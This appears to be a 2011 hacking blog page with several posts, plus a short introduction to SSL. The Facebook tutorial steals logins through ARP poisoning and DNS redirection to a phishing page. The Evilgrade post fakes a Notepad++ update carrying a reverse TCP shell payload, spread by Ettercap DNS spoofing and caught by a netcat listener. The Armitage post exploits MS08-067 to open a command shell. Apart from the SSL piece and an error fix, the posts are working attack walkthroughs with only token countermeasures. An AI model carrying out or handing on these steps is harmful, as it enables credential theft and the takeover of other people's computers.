border: 1px solid #d2d2d2; padding: 0px 8px 0px 8px; color: #a19999; font-size: 12px; height: 25px; width: 165px; border-radius: 5px; -moz-border-radius: 5px; -webkit-border-radius: 5px; margin:0px; } .submitbutton{ background:#F66303; border: 1px solid #F66303; text-shadow: 1px 1px 1px #333; box-shadow: 3px 3px 3px #666; font:bold 12px Arial, sans-serif; color: #fff; height: 25px; padding: 0 12px 0 12px; margin: 0 0 0 5px; border-radius: 5px; -moz-border-radius: 5px; -webkit-border-radius: 5px; cursor:pointer;}

Receive all updates via Facebook. Just Click the Like Button Below

You can also receive Free Email Updates:

Powered By Blogger Widgets

Related Posts Plugin for WordPress, Blogger...

Pages

Thursday, June 30, 2011

Hacking Facebook Using Man in the Middle Attack

In this tutorial I will demonstrate how to hacking Facebook using MITM (Man in the Middle). This attack usually happen inside a Local Area Network (LAN) in office, internet cafe, apartment, etc. Below is the topology or infrastructure how MITM work, and how it can be happen to do hacking a Facebook account. 

In the picture above, the attacker act as the third person attacker will manipulate the switch routing table so the victim will think that attacker is a Web server and vice versa, because the attacker has changed the routing table. 


For this tutorial we need to prepare the tools to do Proof of Concept about this tutorial. Below you can download it. 
1. XAMPP – APACHE+PHP+MySQL(We use XAMPP for our fake facebook web server) 
2. Cain & Abel (We use it for Man in the Middle Attack) 
3. Facebook Offline Page (I have nulled the code, so this script will not contacting Facebook when victim accessed fake Facebook page — only use this for learning) 


Hotfile 
Ziddu 
Easy-Share 


Okay, let's start the step-by-step how to do this:
Attacker IP Address : 192.168.160.148 
Victim IP Address : 192.168.160.82 
Fake Web Server : 192.168.160.148 


I assume you're in a Local Area Network now. 


1. Install the XAMPP and run the APACHE and MySQL service 


2. Extract the fb.rar and copy the content to C:\xampp\htdocs 


3. Check the fake web server by open it in a web browser and type http://localhost/ 


4. Install Cain & Abel and do the APR(ARP Poisoning Routing), just see the step by step how to below 
Click the start/stop sniffer 


Choose your interface for sniffing and click OK. When it's finish, click again the Start/Stop Sniffer to activate the sniffing interface. 


Go to the Sniffer tab and then click the + (plus sign) 


Select "All hosts in my subnet" and Click OK. 


You will see the other people in your network, but my target is 192.168.160.82 (MySelf…LoL :p)

After we got all of the information, click at the bottom of application the APR tab. 


Click the + button, and follow the instruction below. 


When you finish, now the next step is preparing to redirect the www.facebook.com page to the fake web server. 


Click "APR DNS" and click + to add the new redirecting rule. 



When everything is finish, just click OK. Then the next step is to activate the APR by clicking the Start/Stop APR button.   


5. Now Hacking Facebook using MITM has been activated. This is how it looks like when victim opened http://www.facebook.com

6. But if you ping the domain name, you can reveal that it's fake, because the address is IP of the attacker.

Secure Sockets Layer (SSL) - An Introduction

In the OSI model a reference model for effective communication we find a layer named transport layer. Just like a physical layer (where viruses attack normally) transport layer also need some sort of security because transport layer is responsible for transmission of data.

So what actually makes transport layer to make the transmission secure and to protect the data from any intruder.

Have you ever noticed that when you visit some website it starts with http:// and whenever you visit some sort of money transfer and other important websites you find https:// point is clear https means a secure communication it means that your data that transfer from this connection secure by using some cryptography techniques.

SSL or secure sockets layer are cryptographic protocols that provide secure communication over the Internet. So what actually a cryptography is " Cryptography is a science of secrete communication".
SSL uses two keys to encrypt data − a public key known to everyone and a private or secret key known only to the recipient of the message.  

HTTP VS HTTPS 
 

The above picture shows that when ALICE sends the confidential information over insecure channel that there is a chance to sniff this confidential information (it might be a credit card information or may be your password etc). So the point is that an attacker can easily sniff this data and can easily read, understand and use for illegal activities because the data transfer in plain text regardless of any encryption it is simply a HTTP connection. 



Now consider the second picture when an user send some sort of information over secure channel means if someone using HTTPS than the data first encrypt by using cryptography technique than it sends over channel, so in this case if someone sniff this data than he/she not able to understand it. 

The above broad picture has clearly shows that HTTPS is secure, but how HTTPS is secure? Because it uses secure sockets layer (SSL). A website can implement HTTPS by purchasing an SSL Certificate.

Where there's a will there's a way. By following this amazing quote some researcher has discovered some ways to crack/hack SSL certificate too. To hack SSL certificate we will post an article later on.

Wednesday, June 29, 2011

15 Step to Hacking Windows Using Evilgrade 2.0 on Backtrack 5



What is Evilgrade? 
Evilgrade is a modular framework that allows the user to take advantage of poor upgrade implementations by injecting fake updates. It comes with pre-made binaries (agents), a working default configuration for fast pentests, and has it's own WebServer and DNSServer modules. Easy to set up new settings, and has an autoconfiguration when new binary agents are set.


From : http://www.infobytesec.com Requirement : 


1. Evilgrade 


2. Backtrack 5 


Step By Step : 


1. Extract Evilgrade then run it using the command below 


tar xvfz isr-evilgrade-2.0.0.tar.gz cd isr-evilgrade-2.0.0.tar.gz/ ./evilgrade 


If there's an error when you run the application, you can refer to my post about how to solve evilgrade error on Backtrack 5. below is the picture if you success run the application :



2. The next step is you need to determine the target of the application, because Evilgrade will create a fake update to inject the victim computer. To list all the supported application use


evilgrade>show modules 


List of modules: 
=============== 
allmynotes 
amsn 
appleupdate 
apptapp 
apt 
atube 
autoit3 
bbappworld 
blackberry 
bsplayer 
ccleaner 
clamwin 
cpan 
cygwin 
dap 
divxsuite 
express_talk 
fcleaner 
filezilla 
flashget 
flip4mac 
freerip 
getjar 
gom 
googleanalytics 
growl 
isopen 
istat 
itunes 
jet 
jetphot
linkedin 
miranda 
mirc 
nokia 
nokiasoftware 
notepadplus 
openoffice 
opera 
orbit 
osx 
paintnet 
panda_antirootkit 
photoscape 
quicktime 
skype 
sparkle 
speedbit 
sunbelt 
sunjava 
superantispyware 
teamviewer 
techtracker 
trillian 
ubertwitter 
vidbox 
virtualbox 
vmware 
winamp 
winscp 
winupdate 
winzip 
yahoomsn 


63 modules available. 


In this tutorial we will targeting user who use Notepad Plus, so when they're updating their application automatically it will caught in my trap. To use modules, simply run


evilgrade>configure notepadplus 


3. To view the options that you can set up use command show options.




in the image above there's VirtualHost that means when the victim update their notepad plus it will opening URL notepad-plus.sourceforge.net. later we will use this address. 


4. The next step is setting an agent. I'm configuring this agent to create shell_reverse_tcp using msfpayload. 


evilgrade(notepadplus)>set agent '["/pentest/exploits/framework3/msfpayload windows/shell_reverse_tcp LHOST=192.168.8.91 LPORT=1234 X > <%OUT%>/tmp/notepadplus.exe<%OUT%>"]' 


Explanation: 


/pentest/exploits/framework3/msfpayload –> We will load the msfpayload.


windows/shell_reverse_tcp –> We will use windows shell reverse tcp payload to open shell on target when operation succeeded. 


LHOST –> localhost you backtrack 5 ip address / attacker ip address. 


LPORT –> in which port you will interract with the victim when operation succedded. for further information about this you can refer to the readme file


5. The next step is we need to start the evilgrade server. Make sure your port 80 is empty. 








6. After finish setting up Evilgrade, we also need to configure the Man in the Middle attack using Ettercap, then redirect the connection to Evilgrade server when someone updating their notepad plus application. First step is you need to configure etter.dns . 


pico /usr/share/ettercap/etter.dns 




notepad-plus.sourceforge.net –> this address we get from no.3. 




7. For the next step we will use Ettercap 


"Ettercap is a suite for man in the middle attacks on LAN. It features sniffing of live connections, content filtering on the fly and many other interesting tricks. 


It supports active and passive dissection of many protocols (even ciphered ones) and includes many feature for network and host analysis."From : http://ettercap.sourceforge.net


To run Ettercap, open new terminal(Ctrl+Alt+T) run this command 


ettercap -G 


Click Sniff –> Unified sniffing –> choose your network interface card, in this case I'm using eth0. 


8. The next step we need to enable dns_spoof plugin this plugin used to redirect the request from victim to Evilgrade server. Click Plugins –> Manage the plugins –> Double click dns_spoof 




9. The next step is scan hosts in our network, this step is to determine the target. Click Hosts –> Scan for hosts. 


10. After listing all the hosts in the network, we need to set up the target. 


11. We also need to perform Man in the middle attack to intercept all data on network. Click Mitm –> Arp poisoning –> check "Sniff remote connection". 


12. After everything is set up correctly run the Ettercap to start sniffing. 




13. The next step we will use NetCat to listen on port 1234 that we already defined before when setting up Evilgrade. 


"Netcat is a featured networking utility which reads and writes data across network connections, using the TCP/IP protocol. 


It is designed to be a reliable "back-end" tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting built-in capabilities." 


From : http://netcat.sourceforge.net 


Open new terminal(Ctrl+Alt+T) and run this command nc -l -v -p 1234 


Explanation : 


-l : to listen on any incoming connection 
-v : verbose -p : port to listen on 


14. When the user opening their Notepad Plus application and the application asking for update application automatically like the picture below and user answer YES. 




15. Our NetCat terminal will have something interesting because it's already on victim shell.


Countermeasure : 


1. It's better to download directly from the source than automatically update the application 


2. Always update your antivirus

Evilgrade 2.0 Error on Backtrack 5 - Solved



I'm running Evilgrade on Backtrack 5  Evilgrade is a modular framework that allows the user to take advantage of poor upgrade implementations by injecting fake updates. 


It comes with pre-made binaries (agents), a working default configuration for fast pentests, and has it's own WebServer and DNSServer modules. Easy to set up new settings, and has an autoconfiguration when new binary agents are set.   


When I'm trying to running Evilgrade(./evilgrade), there's some error : 


./evilgrade 


Can't locate Data/Dump.pm in @INC (@INC contains: /etc/perl /usr/local/lib/perl/5.10.1 /usr/local/share/perl/5.10.1 /usr/lib/perl5 usr/share/perl5 /usr/lib/perl/5.10 /usr/share/perl/5.10 /usr/local/lib/site_perl .) at isrcore/Shell.pm line 28.   


To solve this error, just run 


cpan Data::Dump 


in your terminal Finish

Tuesday, June 28, 2011

10 Steps to Set Up Armitage in Backtrack for Penetration Test



What is Armitage?
Armitage exists to help security professionals better understand the hacking process and appreciate what's possible with the powerful Metasploit framework. Security professionals who understand hacking will make better decisions to protect you and your information." I copy that paragraph from Fast and Easy Hacking FAQ, but in a simple way to explain what is Armitage, in my opinion it's tools that make you learning about Netowork Security, Metasploit, and NMap more easier because this tools make all of that tools(Metasploit, NMap) in visual way not a command line. Just a few click and you will know the flow of an attack happen in the network.


Read here for latest Backtrack 5 Armitage tutorial


Requirement : 
1. Backtrack 4r2 
2. Armitage (apt-get install armitage from your Backtrack Box) 
3. Java 1.6.0+ 
4. Metasploit 3.5+ 
5. Database (PostgreSQL , MySQL) –> In this tutorial we use MySQL; PostgreSQL usually used when you use Backtrack 4r1   


Step By Step : 
If you still unfamiliar with Backtrack, you can read my previous post about 5 useful things in Backtrack Linux
1. I assume you have already installing Armitage by using apt-get install armitage. The next step is update your metasploit to the latest version by using msfupdate command. This is needed to update our exploit database to the latest version. 
v4L@bt:~# /pentest/exploits/framework3/msfupdate 


2. The next step is enabling RPC Daemon for metasploit, in this case we will use SSL to interact with metasploit. 
v4L@bt:~# /pentest/exploits/framework3/msfrpcd -f -U msf -P test -t Basic 
The above command will start the msfrpcd with the user msf, password test, SSL listener, on the default port 55553. 


3. After setting up the MSRPC Daemon, the next step is turn on our database service (I will use MySQL) 
v4L@bt:~# /etc/init.d/mysql start 


4. The step 1-3 is the needed step to make sure Armitage running correctly without error. If everything is okay, the next step is run the Armitage inside /pentest/exploits/armitage/, so we need to change the directory first. 
v4L@bt:~# cd /pentest/exploits/armitage/ v4L@bt:/pentest/exploits/armitage# ./armitage.sh

5. After the ./armitage.sh command, there's should appear new window to connect to MySQL and mysql msfrpcd. Make sure everything is correct and also check the Use SSL checklist. If everything is OK, click CONNECT


6. Here's the main window of Armitage, at the top of application there's a menu, on the left side there's auxiliary, exploits, and payload from metasploit, and at the bottom of application there's MSFConsole. 
[adsense_id="1"]

7. The next step we need to add host(s). We also can use NMap to scan whole network or specific IP Address. In this case I will use "Quick Scan(OS Detect)" using NMap to find alive hosts in my network. 


My network address is 192.168.1.0/24 class C. 


You need to wait until the tasks completed. Usually it depends on scanning type, if you use intense scan will take more time than quick scan. Below is the picture when it finish doing the task.

If the tools found alive hosts it will be shown like the picture below(also the OS).

8. From the previous image it shows that we need to find some attacks available for the listed hosts. 


You can use automated attack finder from armitage who will find the most suitable attacks for the hosts listed. you can choose both "by Port" or "by Vulnerability". If attack analysis has finished the application will inform you like the picture below.

9. In this example I will try the MS08_067 vulnerability in Windows.

The next step is the same when you use metasploit framework. If you confused in this steps, you can use automated exploitation (leave all the options default), then click LAUNCH and wait.

10. If the targeted hosts is vulnerable with the attack, the color will be changed into red, that's mean that we can breach into the computer.

The next step is right click the hosts and as you can see on the above picture, I choose the command shell to interact with the victim. I think you should know what happen next when I click that option PWNED. 


I hope this tutorial is useful for you, especially for you who want to tests your personal network from security breach by using metasploit.

Follow Us

Share

Twitter Delicious Facebook Digg Stumbleupon Favorites More